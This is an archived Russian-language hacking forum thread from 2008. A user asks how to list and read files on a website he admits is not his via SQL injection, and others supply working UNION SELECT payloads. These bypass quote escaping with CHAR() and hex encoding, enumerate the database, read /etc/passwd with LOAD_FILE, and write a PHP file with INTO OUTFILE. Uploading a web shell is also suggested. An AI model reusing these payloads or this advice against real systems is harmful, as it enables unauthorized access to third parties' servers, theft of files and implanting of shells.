файлы на сервер [Архив] - Форум АНТИЧАТ

Просмотр полной версии : файлы на сервер

downloader

12.12.2008, 21:12

доброго вам дня :)

я хачю у вас просить чтобы вы мне расказали как можна узнати какие файлы на фтп через sql inject если тама сидит филитар на кавычки?

извините за мой рускии...

downloader

13.12.2008, 11:14

ребят но помогите пожалуйста... я сделал через file_load('') но мне показавает
http://s47.radikal.ru/i115/0812/a1/1e464014fede.jpg это филитар на кавычки :( как мне его обаити скажите плз

preda1or

13.12.2008, 11:19

На сколько я понял все кавычки экранируются слэшем, т.е. " ' " заменяется на " \' ".
magic_quotes ON

downloader

13.12.2008, 11:30

да ты правилина понел, да но это не мои сайт, я хачю пасматрети на нём какие фаилы потому что не магу наити один файл... как мне обайти?

Nelzone

13.12.2008, 11:33

какой сайт где ссылка?

preda1or

13.12.2008, 11:39

используй
char и обратные кавычки
SELECT * FROM `user` where `login`= char(39,32,111,114,32,49,32,47,42);

downloader

13.12.2008, 11:55

да но всё это мне надо написати sql inject и чтобы мне показала file_load

script.php?id=-1+union+select+char(39,32,111,114,32,49,32,47,42)/*

но мне это показывает что я написал в char, а мне нужна чтобы делал запрос на сервер чтобы показал файлы которые в сайте..

preda1or

13.12.2008, 12:17

Для начала
script.php?id=-1+union+select+user()/*
script.php?id=-1+union+select+version()/*
script.php?id=-1+union+select+database()/*
script.php?id=-1+union+select+table_name+from+INFORMATION_SCHEMA. TABLES/*

потом пробуй
прочитать файл(нужно знать путь до него)
script.php?id=-1+union+select+LOAD_FILE(0x276574632f7061737377642 f)/*
записать в файл
script.php?id=-1+union+select+0xКОДИРОВАННАЯСТРО� �А+into+outfile+'/tmp/aaa.php'/*

где 0x276574632f7061737377642f это
"0х" - преффикс HEX
"276574632f7061737377642f" = "'etc/passwd'"
(http://www.string-functions.com/string-hex.aspx)

p.s. пробелы лишние убери.

Tigger

13.12.2008, 12:32

Не факт вообще, что есть возможность просматривать файлы.

downloader

13.12.2008, 12:39

preda1or спасибо тебе за то что помагаеш..

вот я паставил в hex

/home/content/r/o/b/robbstudio/html/

получиласи

2f686f6d652f636f6e74656e742f722f6f2f622f726f626273 747564696f2f68746d6c2f

урл получился такой:

script?id=-1+union+select+LOAD_FILE(0x2f686f6d652f636f6e74656 e742f722f6f2f622f726f626273747564696f2f68746d6c2f)/*

но мне пути не показавает, ести ишё методы чтобы видить файлы на сервер?

preda1or

13.12.2008, 12:45

залить шелл например,и через него смотреть. Сори,убегаю, не могу щас помочь дальше

downloader

13.12.2008, 12:47

preda1or ok спасибо тебе ;) удачи